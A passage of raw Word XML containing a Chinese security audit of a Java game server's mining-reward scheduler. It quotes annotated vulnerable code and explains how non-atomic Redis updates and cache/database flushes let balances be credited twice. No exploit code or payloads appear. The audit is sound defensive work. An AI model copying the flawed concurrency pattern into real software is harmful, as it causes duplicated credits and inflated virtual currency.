        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，计算经过秒数，调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>addPending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1177"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>addPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行非原子的「读 pending → 读 hashRate → 计算 → 写 pending → 写 lastTs」，整个过程无任何并发保护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1178"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在水平扩展部署中，多个实例同时为同一用户执行步骤 3，导致 pending 余额被重复累积</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1179"/>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：每次发生竞态，用户可获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>额外一个 tick 周期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的挖矿奖励（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hashRate × TICK_CAP_SECONDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。若系统运行多个实例且用户活跃量大，该缺陷将持续累积，在结算时兑换为实际余额，造成平台虚拟货币持续超发。</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定时触发入口：MiningScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = TICK_INTERVAL_MS)  // ← 每 5 秒触发，多 JVM 实例各自独立调度</w:t>
              <w:br/>
              <w:t>public void tickMiningFromCache() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; activeUserIds = sessionRegistry.getActiveUserIds();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (activeUserIds.isEmpty()) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : activeUserIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userId == null) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (!balanceCache.ensureCached(userId)) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            balanceCache.tick(userId);  // ← 多实例并发处理同一 userId</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② tick：RedisMiningBalanceCache.java</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>public void tick(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String key = balanceKey(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Object lastTsObj = redisTemplate.opsForHash().get(key, "lastTs");  // ← [op1] 读 lastTs（无锁）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (lastTsObj == null) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long lastTs = Long.parseLong(lastTsObj.toString());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long now = System.currentTimeMillis();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long elapsedSeconds = (now - lastTs) / 1000;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (elapsedSeconds &lt;= 0) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    addPending(userId, elapsedSeconds);  // ← 携带已计算的 elapsed 调用下游</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：RedisMiningBalanceCache.java — addPending</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>public void addPending(Long userId, long elapsedSeconds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String key = balanceKey(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String pendingStr = (String) redisTemplate.opsForHash().get(key, "pending");    // ← [op2] 读 pending（非原子）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String hashRateStr = (String) redisTemplate.opsForHash().get(key, "hashRate");  // ← [op3] 读 hashRate（非原子）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (pendingStr == null || hashRateStr == null) return;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    long capped = Math.min(elapsedS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>econds, TICK_CAP_SECONDS);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (capped &lt;= 0) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal pending = new BigDecimal(pendingStr);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal hashRate = new BigDecimal(hashRateStr);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pending = pending.add(hashRate.multiply(BigDecimal.valueOf(capped)));  // ← 本地计算，基于可能已被并发实例写入的 stale 值</w:t>
              <w:br/>
              <w:t xml:space="preserve">    long now = System.currentTimeMillis();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.opsForHash().put(key, "pending", pending.toPlainString()); // ← [op4] 写 pending（非原子，可覆盖或被覆盖）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.opsForHash().put(key, "lastTs", String.valueOf(now));      // ← [op5] 写 lastTs（与 op4 非原子，中间可崩溃）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.opsForSet().add(KEY_ACTIVE, String.valueOf(userId));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.expire(key, TTL_SECONDS, TimeUnit.SECONDS);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// 整个方法：无 Redis 分布式锁、无 Lua 脚本、无 WATCH/MULTI/EXEC 事务保护 ← 漏洞点</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本漏洞为服务端定时任务并发设计缺陷，无 HTTP 攻击向量，无需 HTTP POC。漏洞在多实例部署下于服务内部自动触发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤（触发条件）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1180"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">目标服务以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>≥2 个 JVM 实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>水平扩展部署（或单实例下调度线程池线程数 &gt; 1）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户处于在线活跃状态，被多个实例的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sessionRegistry.getActiveUserIds()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时返回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1182"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个实例同时调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>tick(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>addPending(userId, elapsed)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1183"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">实例 A 先完成 Redis 写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（op4），实例 B 在 A 写完后才执行 Redis 读 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（op2）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1184"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此时实例 B 读到的是已包含 A 本轮奖励的值，并在此基础上再叠加一次相同奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1185"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">结果：用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>原始值 + 2 × hashRate × capped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（双倍奖励入账）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1186"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当 pending 余额结算至数据库时，用户实际余额超发一个 tick 周期的奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（服务端定时任务，无外部触发接口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：无需任何用户操作，多实例部署下系统自动产生</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1189"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发频率：每 5 秒 × 在线用户数次，持续发生</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190"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MiningScheduler.java.tickMiningFromCache → RedisMiningBalanceCache.java.tick → RedisMiningBalanceCache.java.addPending → RedisMiningBalanceCache.java.balanceKey</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audit_m262_1112_tickMiningFromCache_ctrl-path6of14.md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：MiningScheduler.java#flushCacheToDb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_56" w:id="56"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞55：定时落库任务缓存-数据库非原子操作导致金币余额重复入账</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1191"/>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：定时落库任务缓存-数据库非原子操作导致金币余额重复入账（Double-Flush）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1192"/>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src/main/java/com/gameBack/mjservice/scheduler/MiningScheduler.java:flushCacheToDb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1193"/>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1194"/>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195"/>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 xml:space="preserve">：无需攻击者参与，调度任务自动触发；触发条件为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pushBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 DB 事务提交后抛出异常</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flushCacheToDb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的余额落库流程由三步组成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>读缓存 pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balanceCache.getPending(userId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>写数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miningService.flushUserFromCache(userId, pending)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 保证 DB 原子性，提交后不可回滚）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1198"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>清缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balanceCache.afterFlush(userId, newBalance)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balancePushService.pushBalance(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键问题在于：第 2 步（DB 写入）和第 3 步（缓存清除）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不属于同一个事务/原子操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，且整个 try 块使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored) {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 静默吞掉所有异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当第 2 步 DB 事务已成功提交（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
